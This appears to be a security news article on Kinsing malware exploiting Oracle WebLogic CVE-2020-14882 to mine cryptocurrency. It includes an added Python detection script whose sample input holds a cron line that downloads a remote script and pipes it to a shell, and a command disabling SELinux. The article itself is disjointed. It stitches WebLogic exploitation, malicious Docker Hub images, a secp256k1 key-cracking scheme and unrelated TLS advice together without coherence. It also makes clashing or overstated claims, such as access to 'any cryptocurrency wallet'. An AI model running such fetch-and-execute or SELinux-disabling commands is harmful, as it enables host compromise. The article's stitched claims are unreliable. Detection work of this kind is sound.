Wednesday, May 7, 2025

Hackers Exploit WebLogic Vulnerabilities to Deliver Cryptocurrency-Mining Malware

Threat actors are actively exploiting both old and newly discovered vulnerabilities in Oracle WebLogic Server to deliver cryptocurrency-mining malware.

Recent research by Trend Micro has identified a financially motivated group using Python scripts to exploit vulnerabilities in Oracle WebLogic Server.

These scripts disable Security-Enhanced Linux (SELinux) and other OS security features to cripple the host's defenses. The Kinsing malware has previously been used to scan for vulnerable servers as part of building a botnet.

Technical Analysis

Although CVE-2020-14882 is an older vulnerability, malicious actors are still actively weaponizing it to gain a foothold in victim organizations.

Beyond campaigns against container environments, Kinsing actors have also participated in several others.

CVE-2020-14882 is one of the vulnerabilities weaponized in the latest wave of attacks, and it carries a CVSS score of 9.8.

This vulnerability is an RCE flaw that has existed for two years. It allows an attacker to gain control of an unpatched server and deploy malicious payloads and code.

Multiple botnets have exploited this vulnerability in the past to infect Linux systems with the Monero miner as well as the Tsunami backdoor.

The flaw is exploited to deploy a shell script. That script downloads the Kinsing malware from a remote server and installs a cron job to ensure the malware's persistence.
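As an added example (not code from the article or from Trend Micro), the following Python triage script flags the two behaviours described above, a cron job that fetches and runs a remote script and a command that disables SELinux, in constructed crontab and shell-history lines; the sample lines and the address in them are made up for illustration.

```python
"""Triage crontab entries and shell-history lines for the Kinsing-style
behaviours described in the article: cron jobs that fetch and pipe a remote
script into a shell, and commands that disable SELinux. Added example; all
sample lines below are constructed and are not real indicators."""
import re
from typing import Dict, List

# Behavioural patterns, deliberately independent of any specific infrastructure.
RULES = {
    # curl/wget fetching an http(s) resource and piping the result into sh/bash
    "cron_remote_fetch_exec": re.compile(
        r"\b(curl|wget)\b[^|;&]*https?://[^\s|;&]+[^|;&]*\|\s*(ba)?sh\b"),
    # runtime (setenforce) or persistent (config file) SELinux disablement
    "selinux_disable": re.compile(
        r"\bsetenforce\s+(0|permissive)\b|SELINUX\s*=\s*disabled"),
}

def is_cron_entry(line: str) -> bool:
    """True if the line starts with a 5-field cron schedule or an @-macro."""
    return bool(re.match(r"^\s*(@\w+\s|(?:[\d*,/\-]+\s+){5})", line))

def triage(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per suspicious line, naming the rule that fired."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # skip blank lines and cron comments
        for name, rx in RULES.items():
            if rx.search(stripped):
                findings.append({"rule": name,
                                 "cron": is_cron_entry(stripped),
                                 "line": stripped})
                break  # one finding per line is enough for triage
    return findings

# Constructed sample input: a benign cron job, a suspicious one, and a
# shell-history line disabling SELinux (203.0.113.5 is a documentation address).
SAMPLE = [
    "# m h dom mon dow command",
    "0 2 * * * /usr/bin/certbot renew --quiet",
    "* * * * * curl -fsSL http://203.0.113.5/k.sh | sh > /dev/null 2>&1",
    "setenforce 0",
    "ls -la /tmp",
]

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"[{f['rule']}] cron={f['cron']}: {f['line']}")
```

In practice the same rules can be run over `/etc/cron*`, user crontabs and auditd execve records; a hit on a host that also shows a new WebLogic child process is worth an immediate look.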

A number of malicious payloads and malware were allegedly distributed by the following accounts across a variety of channels:

  • alpineos 
  • sandeep078

The malicious payloads distributed include:

  • Rootkits
  • Kubernetes exploit kits
  • Credential stealers
  • XMRig Monero miners
  • Kinsing malware

Docker was notified about the accounts behind the malicious alpineos images; by then the malicious image had already been downloaded over 150,000 times.

Workload Security Modules

A number of Workload Security modules were used to identify systems vulnerable to CVE-2020-14882. These modules were:

  • Intrusion prevention system module
  • Antimalware module
  • Web reputation module
  • Activity monitoring module

The whole attack chain is interesting because it seems to have been designed to make SECP256K1 encryption easier to break. If the actor succeeded in obtaining the keys to a cryptocurrency wallet with this method, it would give them access to any cryptocurrency wallet.

Basically, this scheme aims to illegally leverage the targets' considerable computing power, which is then used to run an ECDLP solver to obtain the keys.

Organizations should configure any publicly exposed REST API with TLS to mitigate the impact of an adversary-in-the-middle (AiTM) attack.

Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.
